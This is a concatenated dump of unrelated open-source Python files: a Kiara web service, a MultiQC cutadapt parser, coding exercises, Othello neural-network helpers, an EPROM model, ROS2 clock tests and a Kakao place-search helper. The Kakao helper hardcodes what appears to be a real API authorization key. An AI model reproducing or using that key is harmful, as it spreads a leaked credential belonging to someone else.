utf-8 -*-\nfrom pathlib import Path\nfrom typing import Any, Dict, List, NoReturn, TypeVar, Union, cast\n\nimport structlog\nfrom jinja2 import Template as JinjaTemplate\nfrom jinja2 import TemplateNotFound as JinjaTemplateNotFound\nfrom orjson import (\n OPT_INDENT_2,\n OPT_NON_STR_KEYS,\n OPT_OMIT_MICROSECONDS,\n OPT_SERIALIZE_NUMPY,\n dumps,\n)\nfrom pydantic import DirectoryPath\nfrom pydantic_openapi_schema.v3_1_0.open_api import OpenAPI\nfrom ruamel.yaml import YAML\nfrom starlite import (\n CORSConfig,\n Provide,\n Request,\n Response,\n Starlite,\n State,\n StaticFilesConfig,\n TemplateConfig,\n)\nfrom starlite.enums import MediaType, OpenAPIMediaType\nfrom starlite.exceptions import ImproperlyConfiguredException, TemplateNotFoundException\nfrom starlite.status_codes import HTTP_204_NO_CONTENT, HTTP_304_NOT_MODIFIED\nfrom starlite.template import TemplateEngineProtocol\nfrom starlite.types import (\n ControllerRouterHandler,\n ExceptionHandlersMap,\n)\nfrom starlite.utils import create_exception_response\n\nfrom kiara.context import Kiara\nfrom kiara.interfaces.python_api import KiaraAPI\nfrom kiara.models import KiaraModel\nfrom kiara.registries.templates import TemplateRegistry\nfrom kiara.utils import is_debug, is_develop\nfrom kiara_plugin.service.defaults import KIARA_SERVICE_RESOURCES_FOLDER\nfrom kiara_plugin.service.openapi.controllers.context_info import (\n DataTypeControllerJson,\n KiaraContextControllerJson,\n)\nfrom kiara_plugin.service.openapi.controllers.jobs import JobControllerJson\nfrom kiara_plugin.service.openapi.controllers.modules import ModuleControllerJson\nfrom kiara_plugin.service.openapi.controllers.operations import (\n OperationControllerJson,\n)\nfrom kiara_plugin.service.openapi.controllers.pipeline import PipelineControllerJson\nfrom kiara_plugin.service.openapi.controllers.render import RenderControllerJson\nfrom kiara_plugin.service.openapi.controllers.values import (\n ValueControllerJson,\n)\nfrom kiara_plugin.service.openapi.controllers.workflows import WorkflowControllerJson\n\nT = TypeVar(\"T\")\n\n\nlogger = structlog.getLogger()\nyaml = YAML(typ=\"safe\")\n\n\nclass KiaraModelResponse(Response):\n @classmethod\n def serializer(cls, value: Any) -> Dict[str, Any]:\n if isinstance(value, KiaraModel):\n return value.dict()\n return super().serializer(value)\n\n def render(self, content: Any) -> bytes:\n \"\"\"\n Handles the rendering of content T into a bytes string.\n Args:\n content: An arbitrary value of type T\n\n Returns:\n An encoded bytes string\n \"\"\"\n try:\n if (\n content is None\n or content is NoReturn\n and (\n self.status_code < 100\n or self.status_code in {HTTP_204_NO_CONTENT, HTTP_304_NOT_MODIFIED}\n )\n ):\n return b\"\"\n if self.media_type == MediaType.JSON:\n return dumps(\n content,\n default=self.serializer,\n option=OPT_SERIALIZE_NUMPY\n | OPT_OMIT_MICROSECONDS\n | OPT_NON_STR_KEYS,\n )\n if isinstance(content, OpenAPI):\n content_dict = content.dict(by_alias=True, exclude_none=True)\n if self.media_type == OpenAPIMediaType.OPENAPI_YAML:\n encoded = yaml.dump(content_dict).encode(\"utf-8\")\n return cast(\"bytes\", encoded)\n return dumps(\n content_dict,\n option=OPT_INDENT_2 | OPT_OMIT_MICROSECONDS | OPT_NON_STR_KEYS,\n )\n return super().render(content)\n except (AttributeError, ValueError, TypeError) as e:\n raise ImproperlyConfiguredException(\n \"Unable to serialize response content\"\n ) from e\n\n\ndef logging_exception_handler(request: Request, exc: Exception) -> Response:\n \"\"\"\n Logs exception and returns appropriate response.\n\n Parameters\n ----------\n request : Request\n The request that caused the exception.\n exc :\n The exception caught by the Starlite exception handling middleware and passed to the\n callback.\n\n Returns\n -------\n Response\n \"\"\"\n logger.error(\"Application Exception\")\n return create_exception_response(exc)\n\n\n# def http_exception_handler(_: Request, exc: Exception) -> Response:\n# \"\"\"Default handler for exceptions subclassed from HTTPException\"\"\"\n# status_code = HTTP_500_INTERNAL_SERVER_ERROR\n# detail = \"\"\n# if hasattr(exc, \"detail\"):\n# detail = exc.detail\n# if hasattr(exc, \"status_code\"):\n# status_code = exc.status_code\n# return Response(\n# media_type=MediaType.TEXT,\n# content=detail,\n# status_code=status_code,\n# )\n# def http_exception_handler(request: Request, exc: HTTPException):\n# return JSONResponse(\n# {\"detail\": exc.detail}, status_code=exc.status_code, headers=exc.headers\n# )\n\n\n# def custom_exception_handler(request: Request, exc: Exception):\n# model = InternalErrorModel.from_exception(exc)\n# return JSONResponse({\"detail\": model.dict()}, status_code=model.status)\n\n\nclass KiaraOpenAPIService:\n def __init__(self, kiara_api: KiaraAPI):\n\n self._kiara_api: KiaraAPI = kiara_api\n self._app: Union[Starlite, None] = None\n self._resources_base: Path = Path(KIARA_SERVICE_RESOURCES_FOLDER)\n\n def app(self) -> Starlite:\n if self._app is not None:\n return self._app\n\n from starlite import Router\n\n value_router = Router(path=\"/data\", route_handlers=[ValueControllerJson])\n operation_router = Router(\n path=\"/operations\", route_handlers=[OperationControllerJson]\n )\n job_router = Router(path=\"/jobs\", route_handlers=[JobControllerJson])\n module_router = Router(path=\"/modules\", route_handlers=[ModuleControllerJson])\n data_type_router = Router(\n path=\"/data-types\", route_handlers=[DataTypeControllerJson]\n )\n render_router = Router(path=\"/render\", route_handlers=[RenderControllerJson])\n workflow_router = Router(\n path=\"/workflows\", route_handlers=[WorkflowControllerJson]\n )\n pipeline_router = Router(\n path=\"/pipelines\", route_handlers=[PipelineControllerJson]\n )\n context_router = Router(\n path=\"/context\", route_handlers=[KiaraContextControllerJson]\n )\n\n # info_router_html = Router(\n # path=\"/html/info\", route_handlers=[OperationControllerHtml]\n # )\n # Router(path=\"/html/values\", route_handlers=[ValueControllerHtmx])\n # Router(path=\"/html/operations\", route_handlers=[OperationControllerHtmx])\n\n route_handlers: List[ControllerRouterHandler] = []\n route_handlers.append(value_router)\n route_handlers.append(module_router)\n route_handlers.append(data_type_router)\n route_handlers.append(operation_router)\n route_handlers.append(job_router)\n route_handlers.append(render_router)\n route_handlers.append(workflow_router)\n route_handlers.append(pipeline_router)\n route_handlers.append(context_router)\n\n # route_handlers.append(value_router_htmx)\n # route_handlers.append(operation_router_htmx)\n\n static_dir = self._resources_base / \"static\"\n\n static_file_config = [\n StaticFilesConfig(directories=[static_dir], path=\"/static\")\n ]\n self._template_registry: TemplateRegistry = TemplateRegistry()\n\n environment = self._template_registry.environment\n\n class KiaraTemplateEngine(TemplateEngineProtocol[JinjaTemplate]):\n \"\"\"Template engine using the default kiara template registry.\"\"\"\n\n def __init__(\n self, directory: Union[DirectoryPath, List[DirectoryPath]]\n ) -> None:\n super().__init__(directory=directory)\n self.engine = environment\n\n def get_template(self, name: str) -> JinjaTemplate:\n \"\"\"Loads the template with the name and returns it.\"\"\"\n try:\n return self.engine.get_template(name=name)\n except JinjaTemplateNotFound as exc:\n raise TemplateNotFoundException(template_name=name) from exc\n\n def engine_callback(jinja_engine: KiaraTemplateEngine) -> KiaraTemplateEngine:\n jinja_engine.engine.globals[\"kiara_api\"] = self._kiara_api\n return jinja_engine\n\n template_config: TemplateConfig = TemplateConfig(\n directory=[], engine=KiaraTemplateEngine, engine_callback=engine_callback\n )\n\n debug = is_debug() or is_develop()\n\n cors_config = CORSConfig()\n exception_handlers: ExceptionHandlersMap = {}\n # exception_handlers[HTTPException] = http_exception_handler\n # exception_handlers[Exception] = custom_exception_handler\n # if is_debug() or is_develop():\n # exception_handlers[HTTPException] = logging_exception_handler\n # exception_handlers[Exception] = http_exception_handler\n\n async def get_kiara_context(state: State) -> Kiara:\n if not hasattr(state, \"kiara\"):\n state.kiara = self._kiara_api.context\n return cast(Kiara, state.kiara)\n\n async def get_kiara_api(state: State) -> KiaraAPI:\n if not hasattr(state, \"kiara_api\"):\n state.kiara_api = self._kiara_api\n return cast(KiaraAPI, state.kiara_api)\n\n async def get_template_registry(state: State) -> TemplateRegistry:\n if not hasattr(state, \"template_registry\"):\n state.template_registry = self._template_registry\n return cast(TemplateRegistry, self._template_registry)\n\n dependencies = {\n \"kiara\": Provide(get_kiara_context),\n \"kiara_api\": Provide(get_kiara_api),\n \"template_registry\": Provide(get_template_registry),\n }\n\n self._app = Starlite(\n route_handlers=route_handlers,\n dependencies=dependencies,\n static_files_config=static_file_config,\n template_config=template_config,\n debug=debug,\n cors_config=cors_config,\n exception_handlers=exception_handlers,\n response_class=KiaraModelResponse,\n )\n return self._app # type: ignore\n","repo_name":"DHARPA-Project/kiara_plugin.service","sub_path":"src/kiara_plugin/service/openapi/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":10579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4921054963","text":"#!/usr/bin/env python\n\n\"\"\" MultiQC module to parse output from Cutadapt \"\"\"\n\nfrom __future__ import print_function\nimport logging\nimport re\nfrom distutils.version import StrictVersion\n\nfrom multiqc.plots import linegraph\nfrom multiqc.modules.base_module import BaseMultiqcModule\n\n# Initialise the logger\nlog = logging.getLogger(__name__)\n\nclass MultiqcModule(BaseMultiqcModule):\n \"\"\"\n Cutadapt module class, parses stderr logs.\n Also understands logs saved by Trim Galore!\n (which contain cutadapt logs)\n \"\"\"\n\n def __init__(self):\n\n # Initialise the parent object\n super(MultiqcModule, self).__init__(name='Cutadapt', anchor='cutadapt',\n href='https://cutadapt.readthedocs.io/',\n info=\"is a tool to find and remove adapter sequences, primers, poly-A\"\\\n \"tails and other types of unwanted sequence from your high-throughput\"\\\n \" sequencing reads.\")\n\n # Find and load any Cutadapt reports\n self.cutadapt_data = dict()\n self.cutadapt_length_counts = dict()\n self.cutadapt_length_exp = dict()\n self.cutadapt_length_obsexp = dict()\n\n for f in self.find_log_files('cutadapt', filehandles=True):\n self.parse_cutadapt_logs(f)\n\n # Filter to strip out ignored sample names\n self.cutadapt_data = self.ignore_samples(self.cutadapt_data)\n\n if len(self.cutadapt_data) == 0:\n raise UserWarning\n\n log.info(\"Found {} reports\".format(len(self.cutadapt_data)))\n\n # Write parsed report data to a file\n self.write_data_file(self.cutadapt_data, 'multiqc_cutadapt')\n\n # Basic Stats Table\n self.cutadapt_general_stats_table()\n\n # Trimming Length Profiles\n self.cutadapt_length_trimmed_plot()\n\n\n def parse_cutadapt_logs(self, f):\n \"\"\" Go through log file looking for cutadapt output \"\"\"\n fh = f['f']\n regexes = {\n '1.7': {\n 'bp_processed': \"Total basepairs processed:\\s*([\\d,]+) bp\",\n 'bp_written': \"Total written \\(filtered\\):\\s*([\\d,]+) bp\",\n 'quality_trimmed': \"Quality-trimmed:\\s*([\\d,]+) bp\",\n 'r_processed': \"Total reads processed:\\s*([\\d,]+)\",\n 'r_with_adapters': \"Reads with adapters:\\s*([\\d,]+)\"\n },\n '1.6': {\n 'r_processed': \"Processed reads:\\s*([\\d,]+)\",\n 'bp_processed': \"Processed bases:\\s*([\\d,]+) bp\",\n 'r_trimmed': \"Trimmed reads:\\s*([\\d,]+)\",\n 'quality_trimmed': \"Quality-trimmed:\\s*([\\d,]+) bp\",\n 'bp_trimmed': \"Trimmed bases:\\s*([\\d,]+) bp\",\n 'too_short': \"Too short reads:\\s*([\\d,]+)\",\n 'too_long': \"Too long reads:\\s*([\\d,]+)\",\n }\n }\n s_name = None\n cutadapt_version = '1.7'\n log_section = None\n for l in fh:\n # New log starting\n if 'cutadapt' in l:\n s_name = None\n c_version = re.match(r'This is cutadapt ([\\d\\.]+)', l)\n if c_version:\n try:\n assert(StrictVersion(c_version.group(1)) <= StrictVersion('1.6'))\n cutadapt_version = '1.6'\n except:\n cutadapt_version = '1.7'\n c_version_old = re.match(r'cutadapt version ([\\d\\.]+)', l)\n if c_version_old:\n try:\n assert(StrictVersion(c_version.group(1)) <= StrictVersion('1.6'))\n cutadapt_version = '1.6'\n except:\n # I think the pattern \"cutadapt version XX\" is only pre-1.6?\n cutadapt_version = '1.6'\n # Get sample name from end of command line params\n if l.startswith('Command line parameters'):\n s_name = l.split()[-1]\n # Manage case where sample name is '-' (reading from stdin)\n if s_name == '-':\n s_name = f['s_name']\n else:\n s_name = self.clean_s_name(s_name, f['root'])\n if s_name in self.cutadapt_data:\n log.debug(\"Duplicate sample name found! Overwriting: {}\".format(s_name))\n self.cutadapt_data[s_name] = dict()\n\n if s_name is not None:\n self.add_data_source(f, s_name)\n\n # Search regexes for overview stats\n for k, r in regexes[cutadapt_version].items():\n match = re.search(r, l)\n if match:\n self.cutadapt_data[s_name][k] = int(match.group(1).replace(',', ''))\n\n # Starting a new section\n if '===' in l:\n log_section = l.strip().strip('=').strip()\n\n # Histogram showing lengths trimmed\n if 'length' in l and 'count' in l and 'expect' in l:\n plot_sname = s_name\n if log_section is not None:\n plot_sname = '{} - {}'.format(s_name, log_section)\n self.cutadapt_length_counts[plot_sname] = dict()\n self.cutadapt_length_exp[plot_sname] = dict()\n self.cutadapt_length_obsexp[plot_sname] = dict()\n # Nested loop to read this section while the regex matches\n for l in fh:\n r_seqs = re.search(\"^(\\d+)\\s+(\\d+)\\s+([\\d\\.]+)\", l)\n if r_seqs:\n a_len = int(r_seqs.group(1))\n self.cutadapt_length_counts[plot_sname][a_len] = int(r_seqs.group(2))\n self.cutadapt_length_exp[plot_sname][a_len] = float(r_seqs.group(3))\n if float(r_seqs.group(3)) > 0:\n self.cutadapt_length_obsexp[plot_sname][a_len] = float(r_seqs.group(2)) / float(r_seqs.group(3))\n else:\n # Cheating, I know. Infinity is difficult to plot.\n self.cutadapt_length_obsexp[plot_sname][a_len] = float(r_seqs.group(2))\n else:\n break\n\n # Calculate a few extra numbers of our own\n for s_name, d in self.cutadapt_data.items():\n if 'bp_processed' in d and 'bp_written' in d:\n self.cutadapt_data[s_name]['percent_trimmed'] = (float(d['bp_processed'] - d['bp_written']) / d['bp_processed']) * 100\n elif 'bp_processed' in d and 'bp_trimmed' in d:\n self.cutadapt_data[s_name]['percent_trimmed'] = ((float(d.get('bp_trimmed', 0)) + float(d.get('quality_trimmed', 0))) / d['bp_processed']) * 100\n\n\n\n def cutadapt_general_stats_table(self):\n \"\"\" Take the parsed stats from the Cutadapt report and add it to the\n basic stats table at the top of the report \"\"\"\n\n headers = {}\n headers['percent_trimmed'] = {\n 'title': '% Trimmed',\n 'description': '% Total Base Pairs trimmed',\n 'max': 100,\n 'min': 0,\n 'suffix': '%',\n 'scale': 'RdYlBu-rev'\n }\n self.general_stats_addcols(self.cutadapt_data, headers)\n\n\n def cutadapt_length_trimmed_plot (self):\n \"\"\" Generate the trimming length plot \"\"\"\n\n description = 'This plot shows the number of reads with certain lengths of adapter trimmed. \\n\\\n Obs/Exp shows the raw counts divided by the number expected due to sequencing errors. A defined peak \\n\\\n may be related to adapter length. See the \\n\\\n cutadapt documentation \\n\\\n for more information on how these numbers are generated.'\n\n pconfig = {\n 'id': 'cutadapt_plot',\n 'title': 'Cutadapt: Lengths of Trimmed Sequences',\n 'ylab': 'Counts',\n 'xlab': 'Length Trimmed (bp)',\n 'xDecimals': False,\n 'ymin': 0,\n 'tt_label': '{point.x} bp trimmed: {point.y:.0f}',\n 'data_labels': [{'name': 'Counts', 'ylab': 'Count'},\n {'name': 'Obs/Exp', 'ylab': 'Observed / Expected'}]\n }\n\n self.add_section(\n description = description,\n plot = linegraph.plot([self.cutadapt_length_counts, self.cutadapt_length_obsexp], pconfig)\n )\n","repo_name":"sert23/miRNAQC","sub_path":"miRQC/multiqc/modules/cutadapt/cutadapt.py","file_name":"cutadapt.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21687130861","text":"def solution(record):\n answer = []\n message = [] #[['Enter', 'id1', 'Eunji'], ['Leave', 'id1']] 이런 식의 리스트\n uid = dict() #id마다 회원의 닉네임을 저장하기 위한 딕셔너리\n\n for i in record: #message리스트와 uid딕셔너리 저장과정\n message.append(i.split(\" \"))\n if message[-1][0] == \"Enter\" or message[-1][0] == \"Change\": #Enter나 Leave할 때마다 id갱신\n uid[message[-1][1]] = message[-1][2]\n\n for i in message:\n if i[0] == \"Enter\":\n answer.append(uid[i[1]] + \"님이 들어왔습니다.\")\n if i[0] == \"Leave\":\n answer.append(uid[i[1]] + \"님이 나갔습니다.\")\n\n return answer\n","repo_name":"ej970624/Coding_Test_Study","sub_path":"programmers_python/LV2/오픈채팅방.py","file_name":"오픈채팅방.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24134382570","text":"text = input()\nphrases = []\nnumbers = []\ncurrent_phrase = \"\"\ncurrent_num = \"\"\n\nfor i in range(len(text)):\n if not text[i].isnumeric():\n current_phrase += text[i].upper()\n if len(current_num) > 0:\n numbers.append(current_num)\n current_num = \"\"\n else:\n current_num += text[i]\n if len(current_phrase) > 0:\n phrases.append(current_phrase)\n current_phrase = \"\"\n if i == len(text) - 1:\n numbers.append(current_num)\n\nprint(f\"Unique symbols used: {len(set(''.join(phrases)))}\")\n[print(phrases[x] * int(numbers[x]), end=\"\") for x in range(len(phrases))]\n","repo_name":"1van101/SoftUni-Software-Engineering","sub_path":"python_fundamentals/16_exercise_text_processing/rage_quit.py","file_name":"rage_quit.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73018627025","text":"from libs.othellogame import WHITE, BLACK\ndef state2img(board, player):\n ''' create an image from the given board, from the given player's \n persepctive '''\n good = [1, 0]\n bad = [0, 1]\n neutral = [0, 0]\n\n if player == WHITE:\n piece2vector = [\n neutral, # EMPTY 0\n good, # WHITE 1\n bad, # BLACK -1\n ]\n else:\n piece2vector = [\n neutral, # EMPTY 0\n bad, # WHITE 1\n good, # BLACK -1\n ]\n img = []\n for row in range(10, 90, 10):\n for piece in board[row+1:row+9]:\n img.append(piece2vector[piece])\n return img\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\ndef generate_model():\n '''generate the standard model used for this othello game'''\n model = keras.Sequential([\n keras.layers.Flatten(input_shape=(8*8, 2)),\n keras.layers.Dense(16),\n keras.layers.Dense(1, activation='linear'),\n ])\n model.compile(\n optimizer='adam',\n loss='mean_squared_error',\n metrics=['mean_squared_error']\n )\n return model\n\nfrom libs.util import ProgressBar\n\ndef generate_population(pop_size=16):\n '''Generate a population of models of size pop_size'''\n print(f\"generating population with size {pop_size}...\")\n bar = ProgressBar(pop_size)\n population = []\n for _ in range(pop_size):\n population.append(generate_model())\n bar.update()\n return population\n\n\n''' SERIALIZATION OF DATA '''\ndef serialize_pop(population):\n \"\"\" Serializes the given population along with each of their scores \"\"\"\n return [ agent.get_weights() for agent in population ]\n\ndef deserialize_pop(serialized_pop):\n pop_size = len(serialized_pop)\n population = generate_population(pop_size)\n print(f\"Deserializing pop data...\")\n bar = ProgressBar(pop_size)\n for agent, weights in zip(population, serialized_pop):\n agent.set_weights(weights)\n bar.update()\n return population\n\n\ndef calc_top_k(population, agent2score, p=0.2):\n \"\"\" calculates the top p% of the population that contribute to the total \n score \"\"\"\n running_total = 0\n ordered_costs = [ agent2score[agent] for agent in population ]\n limit = p * sum(map(abs, ordered_costs))\n for top_cut, agent in enumerate(population, start=1):\n running_total += agent2score[agent]\n if running_total > limit:\n return top_cut\n","repo_name":"HeinrichWizardKreuser/othello-tensorflow","sub_path":"research.py","file_name":"research.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70893270865","text":"from part import PartModel, PartFactory\n\nclass P2K8R(PartFactory):\n\n ''' 2KX8 Latched EPROM '''\n\n def state(self, file):\n ''' Extra state variable '''\n\n file.write(\"\\tuint8_t prom[2050];\\n\")\n file.write(\"\\tint last, nxt;\\n\")\n\n def init(self, file):\n ''' Extra initialization '''\n\n file.fmt('''\n\t\t|\tload_programmable(this->name(), state->prom, sizeof state->prom, arg);\n\t\t|\tstate->nxt = 2048;\n\t\t|''')\n\n def doit(self, file):\n ''' The meat of the doit() function '''\n\n super().doit(file)\n\n file.fmt('''\n\t\t|\tconst char *what = NULL;\n\t\t|\tint adr = 0;\n\t\t|\n\t\t|\tif (state->nxt >= 0) {\n\t\t|\t\tTRACE(\n\t\t|\t\t << \" CK \" << PIN_CK?\n\t\t|\t\t << \" A \" << BUS_A_TRACE()\n\t\t|\t\t << \" MR_ \" << PIN_MR?\n\t\t|\t\t << std::hex << \" nxt \"\n\t\t|\t\t << state->nxt\n\t\t|\t\t << \" D \"\n\t\t|\t\t << std::hex << (unsigned)state->prom[state->nxt]\n\t\t|\t\t);\n\t\t|\t\tBUS_Y_WRITE(state->prom[state->nxt]);\n\t\t|\t\tstate->last = state->nxt;\n\t\t|\t\tstate->nxt = -1;\n\t\t|\t}\n\t\t|\tif (!PIN_MR=>) {\n\t\t|\t\tif (state->last != 2048)\n\t\t|\t\t\tstate->nxt = 2048;\n\t\t|\t\twhat = \" MR \";\n\t\t|\t} else if (PIN_CK.posedge()) {\n\t\t|\t\tBUS_A_READ(adr);\n\t\t|\t\tif (adr != state->last)\n\t\t|\t\t\tstate->nxt = adr;\n\t\t|\t\twhat = \" CLK \";\n\t\t|\t}\n\t\t|\tif (state->nxt >= 0)\n\t\t|\t\tnext_trigger(5, SC_NS);\n\t\t|''')\n\nclass ModelP2K8R(PartModel):\n ''' P2K8R Rom '''\n\n def assign(self, comp, part_lib):\n assert comp.nodes[\"OE\"].net.is_pd()\n for node in comp:\n if node.pin.name[0] == \"Y\":\n node.pin.set_role(\"output\")\n super().assign(comp, part_lib)\n\n def configure(self, comp, part_lib):\n del comp.nodes[\"OE\"]\n sig = self.make_signature(comp)\n ident = self.name + \"_\" + sig\n if ident not in part_lib:\n part_lib.add_part(ident, P2K8R(ident))\n comp.part = part_lib[ident]\n\ndef register(part_lib):\n ''' Register component model '''\n\n part_lib.add_part(\"P2K8R\", ModelP2K8R(\"P2K8R\"))\n","repo_name":"Datamuseum-DK/R1000.Emulator","sub_path":"NetList/model_p2k8r.py","file_name":"model_p2k8r.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"1957266683","text":"import requests\n\naddress_url = \"https://dapi.kakao.com/v2/local/search/address.json\"\nkeyword_url = \"https://dapi.kakao.com/v2/local/search/keyword.json\"\nimage_url = \"https://dapi.kakao.com/v2/search/image\"\nheaders = {\"Authorization\": \"KakaoAK 26218a6de622d05ea125dffbc73a3c38\"}\n\n\ndef address_to_coords(query: str) -> list:\n new_url = keyword_url + '?query=' + query + '&size=5'\n json = requests.get(new_url, headers=headers).json()\n res = []\n for address in json['documents']:\n res.append(dict(name=address['address_name'],\n x=address['x'], y=address['y']))\n return res\n\n\ndef search_by_keyword(coord: dict, query: str) -> list:\n new_url = keyword_url + '?x=' + str(coord['x']) + \\\n '&y=' + str(coord['y']) + '&query=' + query + '&category_group_code=FD6&size=10'\n json = requests.get(new_url, headers=headers).json()\n candidates = []\n for place in json['documents']:\n # images = fetch_images(query=place['place_name'] + place['address_name'], size=5)\n candidates.append({'place_name': place['place_name'], 'address_name': place['address_name'],\n 'category': place['category_name'], 'url': place['place_url']})\n return candidates\n\n\ndef fetch_images(query: str, size: int) -> list:\n new_url = image_url + '?query=' + str(query) + '&size=' + str(size)\n response = requests.get(new_url, headers=headers).json()\n res = []\n for image_info in response['documents']:\n res.append({'thumbnail_url': image_info['thumbnail_url'], 'image_url': image_info['image_url']})\n return res\n","repo_name":"ahnsv/food-ladder","sub_path":"factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74459040464","text":"import omni.kit.test\nimport omni.kit.usd\nimport gc\nimport omni.graph.core as og\nimport carb\nimport asyncio\n\n# Import extension python module we are testing with absolute import path, as if we are external user (other extension)\nimport omni.kit.commands\nfrom omni.isaac.core.utils.physics import simulate_async\nfrom .common import get_qos_profile\n\n# Having a test class dervived from omni.kit.test.AsyncTestCase declared on the root of module will make it auto-discoverable by omni.kit.test\nclass TestRos2BridgeCommands(omni.kit.test.AsyncTestCase):\n # Before running each test\n async def setUp(self):\n import rclpy\n\n await omni.usd.get_context().new_stage_async()\n self._timeline = omni.timeline.get_timeline_interface()\n self._stage = omni.usd.get_context().get_stage()\n self._physics_rate = 60\n carb.settings.get_settings().set_bool(\"/app/runLoops/main/rateLimitEnabled\", True)\n carb.settings.get_settings().set_int(\"/app/runLoops/main/rateLimitFrequency\", int(self._physics_rate))\n carb.settings.get_settings().set_int(\"/persistent/simulation/minFrameRate\", int(self._physics_rate))\n await omni.kit.app.get_app().next_update_async()\n self._stage = omni.usd.get_context().get_stage()\n rclpy.init()\n await omni.kit.app.get_app().next_update_async()\n pass\n\n # After running each test\n async def tearDown(self):\n import rclpy\n\n self._stage = None\n self._timeline = None\n rclpy.shutdown()\n gc.collect()\n pass\n\n async def test_sim_clock(self):\n import rclpy\n from rosgraph_msgs.msg import Clock\n\n keys = og.Controller.Keys\n (graph, nodes, _, _) = og.Controller.edit(\n {\"graph_path\": \"/controller_graph\", \"evaluator_name\": \"execution\"},\n {\n keys.CREATE_NODES: [\n (\"OnTick\", \"omni.graph.action.OnTick\"),\n (\"IsaacClock\", \"omni.isaac.core_nodes.IsaacReadSimulationTime\"),\n (\"RosPublisher\", \"omni.isaac.ros2_bridge.ROS2PublishClock\"),\n ],\n keys.CONNECT: [\n (\"OnTick.outputs:tick\", \"RosPublisher.inputs:execIn\"),\n (\"IsaacClock.outputs:simulationTime\", \"RosPublisher.inputs:timeStamp\"),\n ],\n },\n )\n\n self._time_sec = 0\n\n def clock_callback(data):\n self._time_sec = data.clock.sec + data.clock.nanosec / 1.0e9\n\n node = rclpy.create_node(\"test_sim_clock\")\n clock_sub = node.create_subscription(Clock, \"clock\", clock_callback, get_qos_profile())\n\n def spin():\n rclpy.spin_once(node, timeout_sec=0.1)\n\n self._timeline.play()\n\n await simulate_async(2.1, callback=spin)\n self._timeline.stop()\n self.assertGreater(self._time_sec, 2.0)\n spin()\n pass\n\n async def test_sim_clock_manual(self):\n import rclpy\n from rosgraph_msgs.msg import Clock\n\n keys = og.Controller.Keys\n (graph, nodes, _, _) = og.Controller.edit(\n {\"graph_path\": \"/controller_graph\", \"evaluator_name\": \"execution\"},\n {\n keys.CREATE_NODES: [\n (\"Impulse\", \"omni.graph.action.OnImpulseEvent\"),\n (\"IsaacClock\", \"omni.isaac.core_nodes.IsaacReadSimulationTime\"),\n (\"RosPublisher\", \"omni.isaac.ros2_bridge.ROS2PublishClock\"),\n ],\n keys.SET_VALUES: [(\"IsaacClock.inputs:resetOnStop\", True)],\n keys.CONNECT: [\n (\"Impulse.outputs:execOut\", \"RosPublisher.inputs:execIn\"),\n (\"IsaacClock.outputs:simulationTime\", \"RosPublisher.inputs:timeStamp\"),\n ],\n },\n )\n\n self._time_sec = 0\n\n def clock_callback(data):\n self._time_sec = data.clock.sec + data.clock.nanosec / 1.0e9\n\n node = rclpy.create_node(\"test_sim_clock\")\n clock_sub = node.create_subscription(Clock, \"clock\", clock_callback, get_qos_profile())\n\n def spin():\n rclpy.spin_once(node, timeout_sec=0.1)\n\n await simulate_async(1.0, callback=spin)\n self._timeline.play()\n\n await omni.kit.app.get_app().next_update_async()\n self.assertEqual(self._time_sec, 0.0)\n og.Controller.attribute(\"/controller_graph/Impulse.state:enableImpulse\").set(True)\n # after first step we need to wait for ros node to initialize\n await simulate_async(1.0, callback=spin)\n\n og.Controller.attribute(\"/controller_graph/Impulse.state:enableImpulse\").set(True)\n # wait for message\n await simulate_async(1.0, callback=spin)\n self.assertGreater(self._time_sec, 0.0)\n\n self._timeline.stop()\n spin()\n pass\n\n async def test_system_clock(self):\n import rclpy\n from rosgraph_msgs.msg import Clock\n import time\n\n keys = og.Controller.Keys\n (graph, nodes, _, _) = og.Controller.edit(\n {\"graph_path\": \"/controller_graph\", \"evaluator_name\": \"execution\"},\n {\n keys.CREATE_NODES: [\n (\"OnTick\", \"omni.graph.action.OnTick\"),\n (\"IsaacClock\", \"omni.isaac.core_nodes.IsaacReadSystemTime\"),\n (\"RosPublisher\", \"omni.isaac.ros2_bridge.ROS2PublishClock\"),\n ],\n keys.CONNECT: [\n (\"OnTick.outputs:tick\", \"RosPublisher.inputs:execIn\"),\n (\"IsaacClock.outputs:systemTime\", \"RosPublisher.inputs:timeStamp\"),\n ],\n },\n )\n self._time_sec = 0\n\n def clock_callback(data):\n self._time_sec = data.clock.sec + data.clock.nanosec / 1.0e9\n\n node = rclpy.create_node(\"test_sim_clock\")\n clock_sub = node.create_subscription(Clock, \"clock\", clock_callback, get_qos_profile())\n\n def spin():\n rclpy.spin_once(node, timeout_sec=0.1)\n\n self._timeline.play()\n\n await simulate_async(1.0, callback=spin)\n self.assertAlmostEqual(self._time_sec, time.time(), delta=0.5)\n self._timeline.stop()\n spin()\n pass\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.ros2_bridge-humble/omni/isaac/ros2_bridge/tests/test_clock.py","file_name":"test_clock.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73350652946","text":"\"\"\"Next-gen alignments with BWA (http://bio-bwa.sourceforge.net/)\n\"\"\"\nimport os\nimport subprocess\n\nfrom bcbio.log import logger\nfrom bcbio.pipeline import config_utils\nfrom bcbio.utils import file_exists\nfrom bcbio.distributed.transaction import file_transaction\n\ngalaxy_location_file = \"bwa_index.loc\"\n\ndef align(fastq_file, pair_file, ref_file, out_base, align_dir, config,\n 